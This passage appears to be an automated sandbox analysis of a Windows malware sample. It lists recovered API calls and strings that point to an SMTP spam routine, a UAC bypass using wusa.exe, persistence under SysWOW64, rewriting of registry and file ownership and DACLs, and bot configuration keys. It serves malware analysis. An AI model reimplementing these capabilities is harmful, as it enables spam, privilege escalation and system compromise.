                                                                                        • RegCloseKey.ADVAPI32(?,?,00000001,?,000001F5,?,?,?,00000103,?,?,?,?), ref: 02D7A1D1
                                                                                          • Part of subcall function 02D79966: RegOpenKeyExA.ADVAPI32(80000001,00000000), ref: 02D7999D
                                                                                          • Part of subcall function 02D79966: RegDeleteValueA.ADVAPI32(?,00000000), ref: 02D799BD
                                                                                          • Part of subcall function 02D79966: RegCloseKey.ADVAPI32(?), ref: 02D799C6
                                                                                        • GetModuleHandleA.KERNEL32(?,?,0000012C), ref: 02D7A3DB
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,?,0000012C), ref: 02D7A3E2
                                                                                        • GetDriveTypeA.KERNEL32(00000022), ref: 02D7A41D
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        • API ID: lstrcat$FileModule$DeleteHandle$CloseDirectoryDriveNameOpenProcessTypeValuelstrcpy$AddressAttributesCreateEnvironmentExitInformationPathProcSystemTempVariableVolumeWindowslstrlenwsprintf
                                                                                        • String ID: "$"$"$D$P$\
                                                                                        • API String ID: 1653845638-2605685093
                                                                                        • Opcode ID: 2004a96a3fb695a35ebb74482f6fad10186942e4c1f31b0e0affa7522a4f957f
                                                                                        • Instruction ID: 238b270d6a0cce65ada9d1d891937111537e3d8dcf9f59bee40b8a805c363c66
                                                                                        • Opcode Fuzzy Hash: 2004a96a3fb695a35ebb74482f6fad10186942e4c1f31b0e0affa7522a4f957f
                                                                                        • Instruction Fuzzy Hash: 5CF130B1D40259AFDF21DBA08C48FEF7BBDAB08304F5444A6E645E2241F7798A84CF65
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(ntdll.dll,00000000,00401839,00409646), ref: 00401012
                                                                                        • GetProcAddress.KERNEL32(00000000,RtlExpandEnvironmentStrings_U), ref: 004010C2
                                                                                        • GetProcAddress.KERNEL32(00000000,RtlSetLastWin32Error), ref: 004010E1
                                                                                        • GetProcAddress.KERNEL32(00000000,NtTerminateProcess), ref: 00401101
                                                                                        • GetProcAddress.KERNEL32(00000000,RtlFreeSid), ref: 00401121
                                                                                        • GetProcAddress.KERNEL32(00000000,RtlInitUnicodeString), ref: 00401140
                                                                                        • GetProcAddress.KERNEL32(00000000,NtSetInformationThread), ref: 00401160
                                                                                        • GetProcAddress.KERNEL32(00000000,NtSetInformationToken), ref: 00401180
                                                                                        • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 0040119F
                                                                                        • GetProcAddress.KERNEL32(00000000,NtClose), ref: 004011BF
                                                                                        • GetProcAddress.KERNEL32(00000000,NtOpenProcessToken), ref: 004011DF
                                                                                        • GetProcAddress.KERNEL32(00000000,NtDuplicateToken), ref: 004011FE
                                                                                        • GetProcAddress.KERNEL32(00000000,RtlAllocateAndInitializeSid), ref: 0040121A
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        • API ID: AddressProc$LibraryLoad
                                                                                        • String ID: NtClose$NtDuplicateToken$NtFilterToken$NtOpenProcessToken$NtQueryInformationToken$NtSetInformationThread$NtSetInformationToken$NtTerminateProcess$RtlAllocateAndInitializeSid$RtlExpandEnvironmentStrings_U$RtlFreeSid$RtlInitUnicodeString$RtlLengthSid$RtlNtStatusToDosError$RtlSetLastWin32Error$ntdll.dll
                                                                                        • API String ID: 2238633743-3228201535
                                                                                        • Opcode ID: 099c329b46637f9171a1ca57a4c5e0107e32006a0b8f6d8903d04b45664d461e
                                                                                        • Instruction ID: c8dd2db2df3f08e17c6117e54d1286841a2c4197db930f8a9693796d5e259140
                                                                                        • Opcode Fuzzy Hash: 099c329b46637f9171a1ca57a4c5e0107e32006a0b8f6d8903d04b45664d461e
                                                                                        • Instruction Fuzzy Hash: 2F5100B1662641A6D7118F69EC84BD23AE86748372F14837B9520F62F0D7F8CAC1CB5D

APIs
• GetLocalTime.KERNEL32(0003E800,?,0003E800,00000000), ref: 0040B2B3
• FileTimeToLocalFileTime.KERNEL32(00000000,00000000,?,0003E800,00000000), ref: 0040B2C2
• FileTimeToSystemTime.KERNEL32(00000000,0003E800), ref: 0040B2D0
• SystemTimeToFileTime.KERNEL32(0003E800,00000000), ref: 0040B2E1
• FileTimeToSystemTime.KERNEL32(00000000,0003E800), ref: 0040B31A
• GetTimeZoneInformation.KERNEL32(?), ref: 0040B329
• wsprintfA.USER32 ref: 0040B3B7
Memory Dump Source
• Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• API ID: Time$File$System$Local$InformationZonewsprintf
• String ID: %s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u$Apr$Aug$Dec$Feb$Fri$Jan$Jul$Jun$Mar$May$Mon$Nov$Oct$Sat$Sep$Sun$Thu$Tue$Wed
• API String ID: 766114626-2976066047
• Opcode ID: fbb2cc535003bdd2a03704f06e43c86ec17b275768f9954b8d174276db173d5b
• Instruction ID: 3cccae2c5b68faf9d5e65ebc3321ef0303f497beb4f825406ae493c25d793f5b
• Opcode Fuzzy Hash: fbb2cc535003bdd2a03704f06e43c86ec17b275768f9954b8d174276db173d5b
• Instruction Fuzzy Hash: D8510EB1D0021CAADF18DFD5D8495EEBBB9EF48304F10856BE501B6250E7B84AC9CF98

APIs
• RegOpenKeyExA.ADVAPI32(000000E4,00000022,00000000,000E0100,00000000,00000000), ref: 00407ABA
• GetUserNameA.ADVAPI32(?,?), ref: 00407ADF
• LookupAccountNameA.ADVAPI32(00000000,?,?,0041070C,?,?,?), ref: 00407B16
• RegGetKeySecurity.ADVAPI32(00000000,00000005,?,?), ref: 00407B3B
• GetSecurityDescriptorOwner.ADVAPI32(?,00000022,80000002), ref: 00407B59
• EqualSid.ADVAPI32(?,00000022), ref: 00407B6A
• LocalAlloc.KERNEL32(00000040,00000014), ref: 00407B7E
• InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00407B8C
• SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 00407B9C
• RegSetKeySecurity.ADVAPI32(00000000,00000001,00000000), ref: 00407BAB
• LocalFree.KERNEL32(00000000), ref: 00407BB2
• GetSecurityDescriptorDacl.ADVAPI32(?,00407FC9,?,00000000), ref: 00407BCE
Memory Dump Source
• Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• API ID: Security$Descriptor$LocalNameOwner$AccountAllocDaclEqualFreeInitializeLookupOpenUser
• String ID: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe$D
• API String ID: 2976863881-3037353064
• Opcode ID: d4f479c9f78d504b8da3df740f472ce51a34dde969fc05e485fb9939b8f25359
• Instruction ID: e17c9e5f60e255820364911aa1186e0accab4a2e7248257c6285c946b731c67d
• Opcode Fuzzy Hash: d4f479c9f78d504b8da3df740f472ce51a34dde969fc05e485fb9939b8f25359
• Instruction Fuzzy Hash: 6FA14D71D04219ABDB119FA0DD44EEF7B78FF48304F04807AE505F2290D779AA85CB69

APIs
• RegOpenKeyExA.ADVAPI32(?,?,00000000,000E0100,?), ref: 02D77D21
• GetUserNameA.ADVAPI32(?,?), ref: 02D77D46
• LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 02D77D7D
• RegGetKeySecurity.ADVAPI32(?,00000005,?,?), ref: 02D77DA2
• GetSecurityDescriptorOwner.ADVAPI32(?,?,?), ref: 02D77DC0
• EqualSid.ADVAPI32(?,?), ref: 02D77DD1
• LocalAlloc.KERNEL32(00000040,00000014), ref: 02D77DE5
• InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 02D77DF3
• SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 02D77E03
• RegSetKeySecurity.ADVAPI32(?,00000001,00000000), ref: 02D77E12
• LocalFree.KERNEL32(00000000), ref: 02D77E19
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 02D77E35
Memory Dump Source
• Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
• API ID: Security$Descriptor$LocalNameOwner$AccountAllocDaclEqualFreeInitializeLookupOpenUser
• String ID: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe$D
• API String ID: 2976863881-3037353064
• Opcode ID: 1a53823342927d1e4650e54f1beed8d9b04cc787a6d03e02cd47dd5285ddf864
• Instruction ID: a331afe7b2069b489640250e47c1358173915573c22bfa6d00c6d43fba163a8c
• Opcode Fuzzy Hash: 1a53823342927d1e4650e54f1beed8d9b04cc787a6d03e02cd47dd5285ddf864
• Instruction Fuzzy Hash: 3DA15171900219AFEF11CFA0DD48FEFBBB9FB08304F14856AE505E6250E7798A84DB64

APIs
Memory Dump Source
• Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• API ID: wsprintf$Processhtonl$CurrentExitReadStackWalk64
• String ID: %d=%p$_ax=%p_bx=%p_cx=%p_dx=%p_si=%p_di=%p_bp=%p_sp=%p$ver=%d date=%s %sc=%08x a=%p$ va=%08X%08X uef=%p$12:08:32$Jan 13 2018$except_info$localcfg$plgs:$ret=%pp1=%pp2=%pp3=%pp4=%p
• API String ID: 2400214276-165278494
• Opcode ID: b90de3a98ed26af7195d6c430e21dd073139462529909c443086ffd26068662a
• Instruction ID: e6dd37f2d7c7e48b8b359c94d8b0a85da35b73f81cc1d7405eac3f4e783bc3bd
• Opcode Fuzzy Hash: b90de3a98ed26af7195d6c430e21dd073139462529909c443086ffd26068662a
• Instruction Fuzzy Hash: 26615F72940208EFDB609FB4DC45FEA77E9FF08300F24846AF95DD2161DA7599908F58

APIs
• wsprintfA.USER32 ref: 0040A7FB
• lstrlenA.KERNEL32(?,00000000,00000000,00000001), ref: 0040A87E
• send.WS2_32(00000000,?,00000000,00000000), ref: 0040A893
• wsprintfA.USER32 ref: 0040A8AF
• send.WS2_32(00000000,.,00000005,00000000), ref: 0040A8D2
• wsprintfA.USER32 ref: 0040A8E2
• recv.WS2_32(00000000,?,000003F6,00000000), ref: 0040A97C
• wsprintfA.USER32 ref: 0040A9B9
Memory Dump Source
• Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• API ID: wsprintf$send$lstrlenrecv
• String ID: .$AUTH LOGIN$ESMTP$Error sending command (sent = %d/%d)$Incorrect respons$Too big smtp respons (%d bytes)$Too small respons$data$ehlo %s$helo %s$localcfg$mail from:<%s>$quit$rcpt to:<%s>
• API String ID: 3650048968-2394369944
• Opcode ID: ab93601b3fbd501b452cd95e20af3b55248dc9460a2857cfbe0e165fe481e7b1
• Instruction ID: cb8b6fe7cbcb8804cc0a5996a8d7cccc3c4edaa2c523fe44b9a5a0cb3107b5a3
• Opcode Fuzzy Hash: ab93601b3fbd501b452cd95e20af3b55248dc9460a2857cfbe0e165fe481e7b1
• Instruction Fuzzy Hash: 34A16872A44305AADF209A54DC85FEF3B79AB00304F244437FA05B61D0DA7D9DA98B5F

APIs
• GetUserNameA.ADVAPI32(?,?), ref: 0040782F
• LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00407866
• GetLengthSid.ADVAPI32(?), ref: 00407878
• GetFileSecurityA.ADVAPI32(?,00000005,?,00000400,?), ref: 0040789A
• GetSecurityDescriptorOwner.ADVAPI32(?,00407F63,?), ref: 004078B8
• EqualSid.ADVAPI32(?,00407F63), ref: 004078D2
• LocalAlloc.KERNEL32(00000040,00000014), ref: 004078E3
• InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 004078F1
• SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 00407901
• SetFileSecurityA.ADVAPI32(?,00000001,00000000), ref: 00407910
• LocalFree.KERNEL32(00000000), ref: 00407917
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00407933
• GetAce.ADVAPI32(?,00000000,?), ref: 00407963
• EqualSid.ADVAPI32(?,00407F63), ref: 0040798A
• DeleteAce.ADVAPI32(?,00000000), ref: 004079A3
• EqualSid.ADVAPI32(?,00407F63), ref: 004079C5
• LocalAlloc.KERNEL32(00000040,00000014), ref: 00407A4A
• InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00407A58
• SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,?,00000000), ref: 00407A69
• SetFileSecurityA.ADVAPI32(?,00000004,00000000), ref: 00407A79
• LocalFree.KERNEL32(00000000), ref: 00407A87
Memory Dump Source
• Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• API ID: Security$Descriptor$Local$EqualFile$AllocDaclFreeInitializeNameOwner$AccountDeleteLengthLookupUser
• String ID: D
• API String ID: 3722657555-2746444292
• Opcode ID: bb30bf074c347c8653546d93d28bb934471e976575b6637e302f0e375d0d0c6d
• Instruction ID: df0c13f2d89176358eaf39038022480abc221899387876bf5e0f356ce13a0778
• Opcode Fuzzy Hash: bb30bf074c347c8653546d93d28bb934471e976575b6637e302f0e375d0d0c6d
• Instruction Fuzzy Hash: 59813C71E04119ABDB11CFA5DD44FEFBBB8AB08340F14817AE505F6290D739AA41CF69

APIs
• GetUserNameA.ADVAPI32(?,?), ref: 02D77A96
• LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 02D77ACD
• GetLengthSid.ADVAPI32(?), ref: 02D77ADF
• GetFileSecurityA.ADVAPI32(?,00000005,?,00000400,?), ref: 02D77B01
• GetSecurityDescriptorOwner.ADVAPI32(?,?,?), ref: 02D77B1F
• EqualSid.ADVAPI32(?,?), ref: 02D77B39
• LocalAlloc.KERNEL32(00000040,00000014), ref: 02D77B4A
• InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 02D77B58
• SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 02D77B68
• SetFileSecurityA.ADVAPI32(?,00000001,00000000), ref: 02D77B77
• LocalFree.KERNEL32(00000000), ref: 02D77B7E
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 02D77B9A
• GetAce.ADVAPI32(?,?,?), ref: 02D77BCA
• EqualSid.ADVAPI32(?,?), ref: 02D77BF1
• DeleteAce.ADVAPI32(?,?), ref: 02D77C0A
• EqualSid.ADVAPI32(?,?), ref: 02D77C2C
• LocalAlloc.KERNEL32(00000040,00000014), ref: 02D77CB1
• InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 02D77CBF
• SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,?,00000000), ref: 02D77CD0
• SetFileSecurityA.ADVAPI32(?,00000004,00000000), ref: 02D77CE0
• LocalFree.KERNEL32(00000000), ref: 02D77CEE
Memory Dump Source
• Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
• API ID: Security$Descriptor$Local$EqualFile$AllocDaclFreeInitializeNameOwner$AccountDeleteLengthLookupUser
• String ID: D
• API String ID: 3722657555-2746444292
• Opcode ID: bb30bf074c347c8653546d93d28bb934471e976575b6637e302f0e375d0d0c6d
• Instruction ID: c73575f3dfa05ff2b505e62887fe13f019260b786f91143899529f9df2ea15ca
• Opcode Fuzzy Hash: bb30bf074c347c8653546d93d28bb934471e976575b6637e302f0e375d0d0c6d
• Instruction Fuzzy Hash: 5C813F71900219AFEB11CFA4DD44FEEBBB8EF0C304F14856AE505E6250E7799A45CFA4

APIs
• RegOpenKeyExA.ADVAPI32(80000002,00000000,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 004083F3
• RegQueryValueExA.ADVAPI32(00410750,?,00000000,?,00408893,?,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 00408414
• RegSetValueExA.ADVAPI32(00410750,?,00000000,00000004,00408893,00000004,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 00408441
• RegCloseKey.ADVAPI32(00410750,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 0040844A
Memory Dump Source
• Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• API ID: Value$CloseOpenQuery
• String ID: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe$localcfg
• API String ID: 237177642-1954108138
• Opcode ID: 9b9e109144e0e2d50cf6e1315f69990f798a8bf7c84e3a195e658084b19d70a6
• Instruction ID: 84ba07e5042139a9063b988de9b3f7486f2cd5d6c0453319c527b22e45c4d953
• Opcode Fuzzy Hash: 9b9e109144e0e2d50cf6e1315f69990f798a8bf7c84e3a195e658084b19d70a6
• Instruction Fuzzy Hash: DAC1D2B1D00109BEEB11ABA0DE85EEF7BBCEB04304F14447FF544B2191EA794E948B69

APIs
• ShellExecuteExW.SHELL32(?), ref: 0040139A
• lstrlenW.KERNEL32(-00000003), ref: 00401571
Memory Dump Source
• Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• API ID: ExecuteShelllstrlen
• String ID: $%systemroot%\system32\cmd.exe$<$@$D$PDGu$uac$useless$wusa.exe
• API String ID: 1628651668-3716895483
• Opcode ID: 2389670ef0d52bc0af3abcc9b5081f8297bcd674c671d6a9091d706800eac20c
• Instruction ID: 915494465e6448ea0d8334ed2feda226c725056e28db06d0983f622db304c09c
• Opcode Fuzzy Hash: 2389670ef0d52bc0af3abcc9b5081f8297bcd674c671d6a9091d706800eac20c
• Instruction Fuzzy Hash: E5F19FB55083419FD720DF64C888BABB7E5FB88304F10892EF596A73A0D778D944CB5A

APIs
• GetVersionExA.KERNEL32 ref: 00401DC6
• GetSystemInfo.KERNEL32(?), ref: 00401DE8
• GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 00401E03
• GetProcAddress.KERNEL32(00000000), ref: 00401E0A
• GetCurrentProcess.KERNEL32(?), ref: 00401E1B
• GetTickCount.KERNEL32 ref: 00401FC9
  • Part of subcall function 00401BDF: GetComputerNameA.KERNEL32(?,0000000F), ref: 00401C15
Memory Dump Source
• Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• API ID: AddressComputerCountCurrentHandleInfoModuleNameProcProcessSystemTickVersion
• String ID: IsWow64Process$born_date$flags_upd$hi_id$kernel32$lid_file_upd$loader_id$localcfg$net_type$start_srv$work_srv
• API String ID: 4207808166-1381319158
• Opcode ID: 9f3abc139dc6c88613093014c78d45ea21c86ec42b9258ba851d748653af05de
• Instruction ID: 8f9aaa01d81d5e00f35a14cef107f65a3e8f5b831808d54868c05c9eb27f2f66
• Opcode Fuzzy Hash: 9f3abc139dc6c88613093014c78d45ea21c86ec42b9258ba851d748653af05de
• Instruction Fuzzy Hash: D451D9B05043446FD320AF768C85F67BAECEB84708F04493FF955A2292D7BDA94487A9
                                                                                        APIs
                                                                                        • inet_addr.WS2_32(123.45.67.89), ref: 004019B1
                                                                                        • LoadLibraryA.KERNEL32(Iphlpapi.dll,?,?,?,?,00000001,00401E9E), ref: 004019BF
                                                                                        • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 004019E2
                                                                                        • GetProcAddress.KERNEL32(00000000,GetIfEntry), ref: 004019ED
                                                                                        • GetProcAddress.KERNEL32(?,GetBestInterface), ref: 004019F9
                                                                                        • GetProcessHeap.KERNEL32(?,?,?,?,00000001,00401E9E), ref: 00401A1D
                                                                                        • HeapAlloc.KERNEL32(00000000,00000000,00000288,?,?,?,?,00000001,00401E9E), ref: 00401A36
                                                                                        • HeapReAlloc.KERNEL32(?,00000000,00000000,00401E9E,?,?,?,?,00000001,00401E9E), ref: 00401A5A
                                                                                        • HeapFree.KERNEL32(?,00000000,00000000,?,?,?,?,00000001,00401E9E), ref: 00401A9B
                                                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,00000001,00401E9E), ref: 00401AA4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$AddressProc$AllocFreeLibrary$LoadProcessinet_addr
                                                                                        • String ID: 123.45.67.89$GetAdaptersInfo$GetBestInterface$GetIfEntry$Iphlpapi.dll$localcfg
                                                                                        • API String ID: 835516345-270533642
                                                                                        • Opcode ID: 52436911476c130446cd143f44c65522dc478156bb7ce270366fd521237d2269
                                                                                        • Instruction ID: c689a3d9ae3379b0bfe51822f68a21815d588b76a9689f39126eb657c90dfffc
                                                                                        • Opcode Fuzzy Hash: 52436911476c130446cd143f44c65522dc478156bb7ce270366fd521237d2269
                                                                                        • Instruction Fuzzy Hash: 39313E32A01219AFCF119FE4DD888AFBBB9EB45311B24457BE501B2260D7B94E819F58
                                                                                        APIs
                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,00000000,?,?,00000000,00000103,?), ref: 02D7865A
                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00000000,00000103,?), ref: 02D7867B
                                                                                        • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004,?,?,00000000,00000103,?), ref: 02D786A8
                                                                                        • RegCloseKey.ADVAPI32(?,?,?,00000000,00000103,?), ref: 02D786B1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Value$CloseOpenQuery
                                                                                        • String ID: "$C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe
                                                                                        • API String ID: 237177642-3329995975
                                                                                        • Opcode ID: 1c60b81768065cc7cafd43d65e6870f876b06d8eccb24c6c2cb771a703b3980a
                                                                                        • Instruction ID: 1797055baf979b656e39225fcf5111d41cc7b9feff6d0bfc1f49e70a0bee97de
                                                                                        • Opcode Fuzzy Hash: 1c60b81768065cc7cafd43d65e6870f876b06d8eccb24c6c2cb771a703b3980a
                                                                                        • Instruction Fuzzy Hash: 70C19371900249BEEB11EBA4DD88EEF7BBDEB04304F144066F605E6250F7788E94EB65
                                                                                        APIs
                                                                                        • GetProcessHeap.KERNEL32(00000000,00001000,00000000,?,7591F380), ref: 00402A83
                                                                                        • HeapAlloc.KERNEL32(00000000,?,7591F380), ref: 00402A86
                                                                                        • socket.WS2_32(00000002,00000002,00000011), ref: 00402AA0
                                                                                        • htons.WS2_32(00000000), ref: 00402ADB
                                                                                        • select.WS2_32 ref: 00402B28
                                                                                        • recv.WS2_32(?,00000000,00001000,00000000), ref: 00402B4A
                                                                                        • htons.WS2_32(?), ref: 00402B71
                                                                                        • htons.WS2_32(?), ref: 00402B8C
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000108), ref: 00402BFB
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heaphtons$Process$Allocrecvselectsocket
                                                                                        • String ID:
                                                                                        • API String ID: 1639031587-0
                                                                                        • Opcode ID: 0a9a318a9520cdba09dec5fbe0b7d43cc2391f431d6a7511ea18a0acbd49a9c0
                                                                                        • Instruction ID: 51c4a8f8372388146ce05ee3fd67d3b8acfed2692fca977a8adbfce498b2b585
                                                                                        • Opcode Fuzzy Hash: 0a9a318a9520cdba09dec5fbe0b7d43cc2391f431d6a7511ea18a0acbd49a9c0
                                                                                        • Instruction Fuzzy Hash: FB61D271508305ABD7209F51DE0CB6FBBE8FB48345F14482AF945A72D1D7F8D8808BAA
                                                                                        APIs
                                                                                        • ShellExecuteExW.SHELL32(?), ref: 02D71601
                                                                                        • lstrlenW.KERNEL32(-00000003), ref: 02D717D8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ExecuteShelllstrlen
                                                                                        • String ID: $<$@$D
                                                                                        • API String ID: 1628651668-1974347203
                                                                                        • Opcode ID: 03adf1138caabce6029c68f91071d7d17f6d9527f2eb0b017a6edce7519f1441
                                                                                        • Instruction ID: a6b0cc6e309f42e7103ee249c7b4574f20d5b7503492eccf2063838b79e51845
                                                                                        • Opcode Fuzzy Hash: 03adf1138caabce6029c68f91071d7d17f6d9527f2eb0b017a6edce7519f1441
                                                                                        • Instruction Fuzzy Hash: E0F16BB15083419FD720CF64C889BAAB7E5FB88304F008A2DF59997390E7B8D945CB66
                                                                                        APIs
                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,00000000,00020119,?), ref: 02D776D9
                                                                                        • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000101,?), ref: 02D77757
                                                                                        • RegQueryValueExA.ADVAPI32(?,00000000,?,00000000,?,?,00000104), ref: 02D7778F
                                                                                        • ___ascii_stricmp.LIBCMT ref: 02D778B4
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 02D7794E
                                                                                        • RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 02D7796D
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 02D7797E
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 02D779AC
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 02D77A56
                                                                                          • Part of subcall function 02D7F40C: lstrlen.KERNEL32(000000E4,00000000,004122F8,000000E4,02D7772A,?), ref: 02D7F414
                                                                                        • GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 02D779F6
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 02D77A4D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Close$Open$AttributesEnumFileQueryValue___ascii_stricmplstrlen
                                                                                        • String ID: "
                                                                                        • API String ID: 3433985886-123907689
                                                                                        • Opcode ID: 6662dee372d798d6f1e3baf347185b0c176791543b489e25c2cc06528122fd8e
                                                                                        • Instruction ID: 6aa9ae0beb9d5bfc33b3263d46a89a50b2defd9d341e68676382b4bf0c5ac23e
                                                                                        • Opcode Fuzzy Hash: 6662dee372d798d6f1e3baf347185b0c176791543b489e25c2cc06528122fd8e
                                                                                        • Instruction Fuzzy Hash: 08C19371900249AFEB21DBA4DC44FEEBBB9EF49310F1044A5E544E6290FB79DE84CB60
                                                                                        APIs
                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000101,75920F10,?,75920F10,00000000), ref: 004070C2
                                                                                        • RegEnumValueA.ADVAPI32(75920F10,00000000,?,00000020,00000000,00000000,00000000,0000012C,?,75920F10,00000000), ref: 0040719E
                                                                                        • RegCloseKey.ADVAPI32(75920F10,?,75920F10,00000000), ref: 004071B2
                                                                                        • RegCloseKey.ADVAPI32(75920F10), ref: 00407208
                                                                                        • RegCloseKey.ADVAPI32(75920F10), ref: 00407291
                                                                                        • ___ascii_stricmp.LIBCMT ref: 004072C2
                                                                                        • RegCloseKey.ADVAPI32(75920F10), ref: 004072D0
                                                                                        • RegCloseKey.ADVAPI32(75920F10), ref: 00407314
                                                                                        • GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 0040738D
                                                                                        • RegCloseKey.ADVAPI32(75920F10), ref: 004073D8
                                                                                          • Part of subcall function 0040F1A5: lstrlenA.KERNEL32(000000C8,000000E4,004122F8,000000C8,00407150,?), ref: 0040F1AD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Close$AttributesEnumFileOpenValue___ascii_stricmplstrlen
                                                                                        • String ID: $"
                                                                                        • API String ID: 4293430545-3817095088
                                                                                        • Opcode ID: 74e128f8df151d438ab4d1c82f82d45ce79a9eea08151c9b6eb13cdb2253fb65
                                                                                        • Instruction ID: bdd769efad709bd93da993ba4a974553bca105625a5613f565cdc8f40f8c6bf1
                                                                                        • Opcode Fuzzy Hash: 74e128f8df151d438ab4d1c82f82d45ce79a9eea08151c9b6eb13cdb2253fb65
                                                                                        • Instruction Fuzzy Hash: 8FB17F71D0820ABAEB159FA1DC45BEF77B8AB04304F10047BF501F61D1EB79AA94CB69
                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 02D72CED
                                                                                        • socket.WS2_32(00000002,00000002,00000011), ref: 02D72D07
                                                                                        • htons.WS2_32(00000000), ref: 02D72D42
                                                                                        • select.WS2_32 ref: 02D72D8F
                                                                                        • recv.WS2_32(?,00000000,00001000,00000000), ref: 02D72DB1
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000108), ref: 02D72E62
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        Yara matches
